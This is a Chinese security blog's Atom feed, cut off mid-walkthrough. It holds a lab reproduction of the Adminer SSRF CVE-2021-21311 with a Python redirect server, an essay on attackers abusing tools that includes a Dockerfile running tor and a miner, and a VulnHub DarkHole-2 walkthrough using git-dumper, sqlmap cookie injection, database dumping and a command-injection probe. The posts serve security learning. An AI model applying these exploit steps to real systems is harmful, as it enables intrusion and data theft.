<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>百山木兮</title>
  
  <subtitle>个人博客</subtitle>
  <link href="http://example.com/atom.xml" rel="self"/>
  
  <link href="http://example.com/"/>
  <updated>2025-08-06T16:51:53.586Z</updated>
  <id>http://example.com/</id>
  
  <author>
    <name>百山木兮</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>CVE-2021-21311复现学习</title>
    <link href="http://example.com/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/"/>
    <id>http://example.com/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/</id>
    <published>2025-08-06T16:48:18.000Z</published>
    <updated>2025-08-06T16:51:53.586Z</updated>
    
    <content type="html"><![CDATA[<h1 id="CVE-2021-21311复现学习"><a href="#CVE-2021-21311复现学习" class="headerlink" title="CVE-2021-21311复现学习"></a>CVE-2021-21311复现学习</h1><p>adminer版本是4.7.8，是php编写的 <strong>[数据库管理工具]</strong> ，<strong>存在漏洞 CVE-2021-21311</strong> ，它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。</p><p>此漏洞是 <strong>[SSRF]</strong> ，服务端请求伪造</p><p>adminer服务端ip为<a href="http://10.22.234.145/">http://10.22.234.145/</a></p><p>Adminer登录页面，选择ElasticSearch作为系统目标，并在server字段填写<code>example.com</code>，点击登录即可看到<code>example.com</code>返回的400错误页面展示在页面中</p><p><img src="/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/image-20250807003647448.png" alt="image-20250807003647448"></p><p>在10.132.1.39启动一个python服务器，该服务监听传入的连接</p><p><img src="/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/image-20250807003932498.png" alt="image-20250807003932498"></p><p>漏洞利用成功，可以看到页面上就显示了<code>flag.txt</code>文件的内容。</p><p><img src="/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/image-20250807004016711.png" alt="image-20250807004016711"></p><p>当然在这里官方也提供了一个更便捷的python脚本</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> http.server</span><br><span class="line"><span class="keyword">import</span> socketserver</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RedirectHandler</span>(http.server.BaseHTTPRequestHandler):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">do_GET</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="comment"># 设置重定向到指定URL</span></span><br><span class="line">        <span class="variable language_">self</span>.send_response(<span class="number">301</span>)  <span class="comment"># 301: 永久重定向</span></span><br><span class="line">        <span class="variable language_">self</span>.send_header(<span class="string">&#x27;Location&#x27;</span>, <span class="string">&#x27;http://10.22.234.145:80/flag.txt&#x27;</span>)  <span class="comment"># 设置重定向地址</span></span><br><span class="line">        <span class="variable language_">self</span>.end_headers()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run</span>(<span class="params">server_class=http.server.HTTPServer, handler_class=RedirectHandler</span>):</span><br><span class="line">    server_address = (<span class="string">&#x27;&#x27;</span>, <span class="number">1111</span>)  <span class="comment"># 监听1111端口</span></span><br><span class="line">    httpd = server_class(server_address, handler_class)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;Server running on port 80...&#x27;</span>)</span><br><span class="line">    httpd.serve_forever()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    run()</span><br></pre></td></tr></table></figure><p><img src="/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/image-20250807004349461.png" alt="image-20250807004349461"></p><p>漏洞利用成功，可以看到页面上就显示了<code>flag.txt</code>文件的内容。</p><p><strong>该靶场由NextCyber提供，如果你也对渗透测试感兴趣，这个平台是个不错的选择。</strong><br><strong>地址:</strong><a href="https://app.nextcyber.cn/">nextcyber</a></p><p><img src="/2025/08/07/CVE-2021-21311%E5%A4%8D%E7%8E%B0%E5%AD%A6%E4%B9%A0/image-20250807004659984.png" alt="image-20250807004659984"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;CVE-2021-21311复现学习&quot;&gt;&lt;a href=&quot;#CVE-2021-21311复现学习&quot; class=&quot;headerlink&quot; title=&quot;CVE-2021-21311复现学习&quot;&gt;&lt;/a&gt;CVE-2021-21311复现学习&lt;/h1&gt;&lt;p&gt;admine</summary>
      
    
    
    
    <category term="Web" scheme="http://example.com/categories/Web/"/>
    
    <category term="NextCyber" scheme="http://example.com/categories/Web/NextCyber/"/>
    
    
    <category term="Web" scheme="http://example.com/tags/Web/"/>
    
  </entry>
  
  <entry>
    <title>当安全工具成为黑客的瑞士军刀</title>
    <link href="http://example.com/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/"/>
    <id>http://example.com/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/</id>
    <published>2025-07-25T18:00:03.000Z</published>
    <updated>2025-07-25T18:15:00.293Z</updated>
    
    <content type="html"><![CDATA[<h2 id="当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争"><a href="#当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争" class="headerlink" title="当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争"></a>当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争</h2><p>我盯着屏幕上跳动的警报，端起凉透的咖啡猛灌一口。凌晨三点，安全运营中心冷白的灯光下，又一波异常流量正疯狂冲击着客户边缘节点。这不是普通的DDoS攻击——攻击者正在用客户自己的云日志服务作为跳板，把正常功能扭曲成攻击武器。安全行当里最讽刺的事情正在上演：<strong>我们精心打造的防御武器库，正在被对手拆解重组，变成刺向自己的利刃</strong>。</p><h3 id="一、安全边界的崩塌：当「正常」成为「武器」"><a href="#一、安全边界的崩塌：当「正常」成为「武器」" class="headerlink" title="一、安全边界的崩塌：当「正常」成为「武器」"></a>一、安全边界的崩塌：当「正常」成为「武器」</h3><p><strong>场景一：云日志服务的「叛变」</strong></p><p><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726014411729.png" alt="image-20250726014411729"></p><p>某时间处理的安全事件中，攻击者通过泄露的访问密钥（Access Key）侵入某电商平台。他们没有直接窃取数据，而是操控云日志服务：</p><ol><li>利用日志服务的写入权限，注入恶意脚本</li><li>通过日志查询接口触发脚本执行</li><li>在日志流中构建隐蔽的C2通信隧道</li></ol><p><strong>我们亲手部署的监控系统，成了黑客的藏身之处</strong>。当安全工具开始“背叛”，传统的边界防御瞬间形同虚设。</p><p><strong>场景二：办公软件的「双面人生」</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726014718754.png" alt="image-20250726014718754"></p><p>某金融公司内网检测到异常横向移动。溯源发现攻击链起点竟是技术部门的内部交流群：</p><ul><li>攻击者将恶意代码隐藏在“项目进度表.xlsx”宏指令中</li><li>利用聊天软件的@全员功能确保广泛传播</li><li>通过软件自带的屏幕共享功能进行内部侦察</li></ul><p><strong>沟通工具变成了攻击导管</strong>，这种对信任体系的腐蚀比技术漏洞更致命。</p><h3 id="二、攻击者的工具箱：来自我们自己的馈赠"><a href="#二、攻击者的工具箱：来自我们自己的馈赠" class="headerlink" title="二、攻击者的工具箱：来自我们自己的馈赠"></a>二、攻击者的工具箱：来自我们自己的馈赠</h3><p>黑客的军火库里，正堆满我们“赠送”的武器：</p><p><strong>1. API网关：黑客的免费地铁</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/5a63f291196c4f4395aeb2b2709db415.png" alt="5a63f291196c4f4395aeb2b2709db415">)</p><p>某物联网平台遭遇大规模数据泄露，根源竟是公开的调试接口：</p><p>plaintext</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 攻击者利用的“合法”请求链</span><br><span class="line">1. POST /api/v1/debug/device_logs (获取设备ID列表)</span><br><span class="line">2. GET /api/v1/devices/&#123;id&#125;/config?admin_token=leaked_value (提取配置)</span><br><span class="line">3. PUT /api/v1/firmware/update (植入后门固件)</span><br></pre></td></tr></table></figure><p>这些接口文档就挂在开发者门户上，攻击者甚至不需要暴力破解。</p><p><strong>2. CDN服务：恶意流量的隐身衣</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015129137.png" alt="image-20250726015129137"></p><p>最近阻断的撞库攻击显示：</p><ul><li>76%的恶意请求来自知名CDN服务IP</li><li>攻击者注册免费CDN账户绑定恶意域名</li><li>利用CDN的全球节点隐藏真实源IP</li></ul><p>我们用来加速网站的工具，成了攻击者的全球代理网络。</p><p><strong>3. 容器技术：完美的犯罪胶囊</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726021458474.png" alt="image-20250726021458474"></p><p>在挖矿攻击中发现新型逃逸技术：</p><p>dockerfile</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FROM alpine:latest</span><br><span class="line">RUN apk add --no-cache tor </span><br><span class="line">COPY miner /tmp/</span><br><span class="line">CMD [&quot;sh&quot;,&quot;-c&quot;,&quot;tor &amp; /tmp/miner --quiet&quot;]</span><br></pre></td></tr></table></figure><p>攻击者通过漏洞在K8s集群部署临时容器，资源消耗达阈值后自动销毁证据，整个过程不到15分钟。</p><h3 id="三、重构防御：在混沌中建立新秩序"><a href="#三、重构防御：在混沌中建立新秩序" class="headerlink" title="三、重构防御：在混沌中建立新秩序"></a>三、重构防御：在混沌中建立新秩序</h3><p>当武器库开始反噬，我们需要更聪明的防御策略：</p><p><strong>1. 行为基因库建设</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015331632.png" alt="image-20250726015331632"></p><p>在客户环境部署的行为分析系统捕获的异常序列：</p><p>plaintext</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[正常行为] </span><br><span class="line">日志写入 -&gt; 日志查询 -&gt; 结果下载 </span><br><span class="line"></span><br><span class="line">[攻击行为]</span><br><span class="line">日志写入 -&gt; 高频精准查询 -&gt; Base64编码结果导出 -&gt; 外部IP通信</span><br></pre></td></tr></table></figure><p>通过建立200+维度的行为特征模型，误报率下降62%。</p><p><strong>2. 动态诱捕网络</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015439943.png" alt="image-20250726015439943"></p><p>我们部署的云蜜罐捕获的攻击者操作记录：</p><p>plaintext</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">2023-08-21 04:17:02 | 攻击者1号进入AWS仿真环境</span><br><span class="line">04:22:15 | 尝试创建IAM角色Policy: AdministratorAccess</span><br><span class="line">04:25:43 | 执行CloudTrail日志删除命令</span><br><span class="line">04:27:11 | 触发伪装密钥告警（实际为陷阱密钥）</span><br></pre></td></tr></table></figure><p>通过147个动态变化的诱饵系统，平均延迟攻击者入侵时间3.7小时。</p><p><strong>3. 零信任的实战演化</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015529891.png" alt="image-20250726015529891"></p><p>在某医疗客户实施的渐进方案：</p><p>plaintext</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">阶段1：拆除VPN -&gt; 应用级SDP网关</span><br><span class="line">阶段2：静态RBAC -&gt; 动态策略引擎（基于设备健康度+行为评分）</span><br><span class="line">阶段3：4小时会话令牌 -&gt; 连续生物认证（键盘动力学+鼠标行为）</span><br></pre></td></tr></table></figure><p>实施后内部威胁事件下降89%，第三方接入风险降低76%。</p><h3 id="四、未来战场：正在逼近的暗影"><a href="#四、未来战场：正在逼近的暗影" class="headerlink" title="四、未来战场：正在逼近的暗影"></a>四、未来战场：正在逼近的暗影</h3><p>新的风暴正在地平线积聚：</p><p><strong>AI社工攻击</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015613075.png" alt="image-20250726015613075"></p><p>最近截获的AI钓鱼样本特征：</p><ul><li>精准模仿CEO邮件风格（基于公开演讲训练）</li><li>嵌入客户合同专用术语</li><li>使用Deepfake语音验证指令</li></ul><p><strong>量子勒索的倒计时</strong><br><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015709260.png" alt="image-20250726015709260"></p><p>我们的密码迁移压力测试显示：</p><ul><li>传统VPN隧道升级后吞吐量下降40%</li><li>HSM设备量子抗性改造周期需9-14个月</li><li>部分旧医疗设备无法支持新协议</li></ul><h3 id="五、坚守的意义：在数字废墟中重建信任"><a href="#五、坚守的意义：在数字废墟中重建信任" class="headerlink" title="五、坚守的意义：在数字废墟中重建信任"></a>五、坚守的意义：在数字废墟中重建信任</h3><p>凌晨的告警终于平息。窗外天色微明，屏幕上的防御矩阵图缓缓旋转。这个职业教会我最重要的事：<strong>安全不是技术竞赛，而是守护人性的战争</strong>。</p><p>当看到黑客利用我们开发的工具作恶时，与其愤怒，不如行动：</p><ol><li>在代码审查中加入“武器化风险评估”</li><li>为每个新功能设计“防滥用熔断器”</li><li>用攻击者思维重新审视自己的系统</li></ol><p><img src="/2025/07/26/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/image-20250726015911840.png" alt="image-20250726015911840"></p><p><strong>我们建造城墙，不仅为了抵御外敌，更为证明：在技术与人性的交锋中，守护的意志终将胜过破坏的贪婪</strong>。这或许就是为什么，在无数个这样的凌晨，我们仍选择坐在屏幕前——因为相信，每一道精心设计的防御，都在让数字世界少一个沉默的受害者。</p><blockquote><p><strong>后记</strong><br>文末互动：<br>【你遇到过最“讽刺”的安全事件是？】</p></blockquote>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争&quot;&gt;&lt;a href=&quot;#当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争&quot; class=&quot;headerlink&quot; title=&quot;当安全工具成为黑客的瑞士军刀：一场发生在你我身边的隐秘战争&quot;&gt;&lt;/a</summary>
      
    
    
    
    <category term="随笔" scheme="http://example.com/categories/%E9%9A%8F%E7%AC%94/"/>
    
    
    <category term="随笔" scheme="http://example.com/tags/%E9%9A%8F%E7%AC%94/"/>
    
    <category term="当安全工具成为黑客的瑞士军刀" scheme="http://example.com/tags/%E5%BD%93%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%88%90%E4%B8%BA%E9%BB%91%E5%AE%A2%E7%9A%84%E7%91%9E%E5%A3%AB%E5%86%9B%E5%88%80/"/>
    
  </entry>
  
  <entry>
    <title>vulnhub靶场-DarkHole-2</title>
    <link href="http://example.com/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/"/>
    <id>http://example.com/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/</id>
    <published>2025-02-04T16:00:00.000Z</published>
    <updated>2025-02-09T14:03:33.137Z</updated>
    
    <content type="html"><![CDATA[<h1 id="VulnHub-DarkHole-2靶机实战"><a href="#VulnHub-DarkHole-2靶机实战" class="headerlink" title="VulnHub-DarkHole_2靶机实战"></a>VulnHub-DarkHole_2靶机实战</h1><h2 id="一、环境搭建"><a href="#一、环境搭建" class="headerlink" title="一、环境搭建"></a>一、环境搭建</h2><h3 id="靶机下载"><a href="#靶机下载" class="headerlink" title="靶机下载"></a>靶机下载</h3><p>靶机下载地址：<a href="https://vulnhub.com/entry/darkhole-2,740/">https://vulnhub.com/entry/darkhole-2,740/</a></p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205133035113.png" alt="image-20250205133035113"></p><h3 id="启动靶场"><a href="#启动靶场" class="headerlink" title="启动靶场"></a>启动靶场</h3><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205133114811.png" alt="image-20250205133114811"></p><h2 id="二、信息收集"><a href="#二、信息收集" class="headerlink" title="二、信息收集"></a>二、信息收集</h2><h3 id="确定靶机地址"><a href="#确定靶机地址" class="headerlink" title="确定靶机地址"></a>确定靶机地址</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205133416585.png" alt="image-20250205133416585"></p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -v -A -sV -p- 192.168.147.133</span><br></pre></td></tr></table></figure><p>经过扫描查看开放了22、80端口</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205133539454.png" alt="image-20250205133539454"></p><h3 id="访问HTTP端口-80"><a href="#访问HTTP端口-80" class="headerlink" title="访问HTTP端口:80"></a>访问HTTP端口:80</h3><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205133654452.png" alt="image-20250205133654452"></p><h3 id="进行目录扫描，查看可以访问目录"><a href="#进行目录扫描，查看可以访问目录" class="headerlink" title="进行目录扫描，查看可以访问目录"></a>进行目录扫描，查看可以访问目录</h3><p>可以看到,扫描到了.git文件,之后我们可以使用工具将代码还原</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205134007414.png" alt="image-20250205134007414"></p><h3 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>指纹识别</h3><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205134116180.png" alt="image-20250205134116180"></p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205134238309.png" alt="image-20250205134238309"></p><h2 id="三、Web渗透"><a href="#三、Web渗透" class="headerlink" title="三、Web渗透"></a>三、Web渗透</h2><h3 id="利用-git还原代码"><a href="#利用-git还原代码" class="headerlink" title="利用.git还原代码"></a>利用.git还原代码</h3><p>由于主界面是login，但是我们并没有用户名以及密码</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205134403813.png" alt="image-20250205134403813"></p><p>可以从其他地方进行突破.</p><p>&#x2F;.git&#x2F;：可以通过&#x2F;.git&#x2F;得到网页源代码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.147.133/.git/</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205134501739.png" alt="image-20250205134501739"></p><h3 id="使用Dump-all下载git文件夹内所有文件"><a href="#使用Dump-all下载git文件夹内所有文件" class="headerlink" title="使用Dump all下载git文件夹内所有文件"></a>使用Dump all下载git文件夹内所有文件</h3><h4 id="安装git-dumper"><a href="#安装git-dumper" class="headerlink" title="安装git-dumper"></a>安装git-dumper</h4><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205140051032.png" alt="image-20250205140051032"></p><h4 id="使用git-dumper下载git文件夹内容"><a href="#使用git-dumper下载git文件夹内容" class="headerlink" title="使用git-dumper下载git文件夹内容"></a>使用git-dumper下载git文件夹内容</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git-dumper http://192.168.147.133/.git/ 192.168.147.133 </span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205140018687.png" alt="image-20250205140018687"></p><h4 id="切换到192-168-147-133文件夹-查看日志"><a href="#切换到192-168-147-133文件夹-查看日志" class="headerlink" title="切换到192.168.147.133文件夹,查看日志"></a>切换到192.168.147.133文件夹,查看日志</h4><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205140238450.png" alt="image-20250205140238450"></p><p>出现了三次提交,还有哈希值,作者,时间等.</p><h4 id="对比三次提交"><a href="#对比三次提交" class="headerlink" title="对比三次提交"></a>对比三次提交</h4><p>git diff #获得当前目录上次提交和本地索引的差距,也就是你在什么地方修改了代码.</p><p>这里我们逐个查看:</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205140416731.png" alt="image-20250205140416731"></p><p>其中发现了账户邮箱以及密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lush@admin.com</span><br><span class="line">321</span><br></pre></td></tr></table></figure><h3 id="登录网页"><a href="#登录网页" class="headerlink" title="登录网页"></a>登录网页</h3><h4 id="进行登录测试"><a href="#进行登录测试" class="headerlink" title="进行登录测试"></a>进行登录测试</h4><p>进到页面之后发现url有id&#x3D;1的参数值,这里可以试一试SQL注入</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205140620984.png" alt="image-20250205140620984"></p><h4 id="确定存在sql注入点"><a href="#确定存在sql注入点" class="headerlink" title="确定存在sql注入点"></a>确定存在sql注入点</h4><p>使用sqlmap直接梭哈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.147.133/dashboard.php?id=1%27</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205140733853.png" alt="image-20250205140733853"></p><p>发现页面主进不去，尝试使用cookie注入</p><p>获取当前用户的Cookie: “F12”-&gt;”网络”-&gt;”200”-&gt;”消息头”-&gt;”请求头”-&gt;”Cookie”</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205141417797.png" alt="image-20250205141417797"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;192.168.147.133/dashboard.php?id=1&quot; --cookie PHPSESSID=cuk869g1jts78vt9h9pchvol66 --batch --current-db</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205141536370.png" alt="image-20250205141536370"></p><p>这里我们获取到了数据库名:<strong>darkhole_2</strong></p><p>我们这里在获取他的表名</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;192.168.147.133/dashboard.php?id=1&quot; --cookie PHPSESSID=cuk869g1jts78vt9h9pchvol66 --batch -D darkhole_2 --tables</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205141652118.png" alt="image-20250205141652118"></p><p>得到两个表: <strong>ssh &#x2F; users</strong></p><p>查看ssh表,用于我们后面进行ssh连接.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;192.168.147.133/dashboard.php?id=1&quot; --cookie PHPSESSID=cuk869g1jts78vt9h9pchvol66 --batch -D darkhole_2 -T ssh --dump-all</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205141832121.png" alt="image-20250205141832121"></p><p>知道ssh的用户名和密码之后,我们可以尝试ssh连接.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh jehad@192.168.147.133</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205143512170.png" alt="image-20250205143512170"></p><h3 id="ssh登录成功。可直接进losy用户，第一个flag。"><a href="#ssh登录成功。可直接进losy用户，第一个flag。" class="headerlink" title="ssh登录成功。可直接进losy用户，第一个flag。"></a>ssh登录成功。可直接进losy用户，第一个flag。</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /home/jehad &amp;&amp; cat user.txt</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205144842480.png" alt="image-20250205144842480"></p><h2 id="四、提权"><a href="#四、提权" class="headerlink" title="四、提权"></a>四、提权</h2><h3 id="查看权限"><a href="#查看权限" class="headerlink" title="查看权限"></a>查看权限</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205143740914.png" alt="image-20250205143740914"></p><p><strong>发现我们并不是0用户(root)</strong></p><h3 id="查看活动端口"><a href="#查看活动端口" class="headerlink" title="查看活动端口"></a>查看活动端口</h3><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205143952159.png" alt="image-20250205143952159"></p><p><strong>发现本地有9999端口的服务.</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -lntp</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205144446984.png" alt="image-20250205144446984"></p><h3 id="查看一下本地服务的内容"><a href="#查看一下本地服务的内容" class="headerlink" title="查看一下本地服务的内容"></a>查看一下本地服务的内容</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &quot;http://127.0.0.1:9999/?cmd=id&quot;</span><br></pre></td></tr></table></figure><p><img 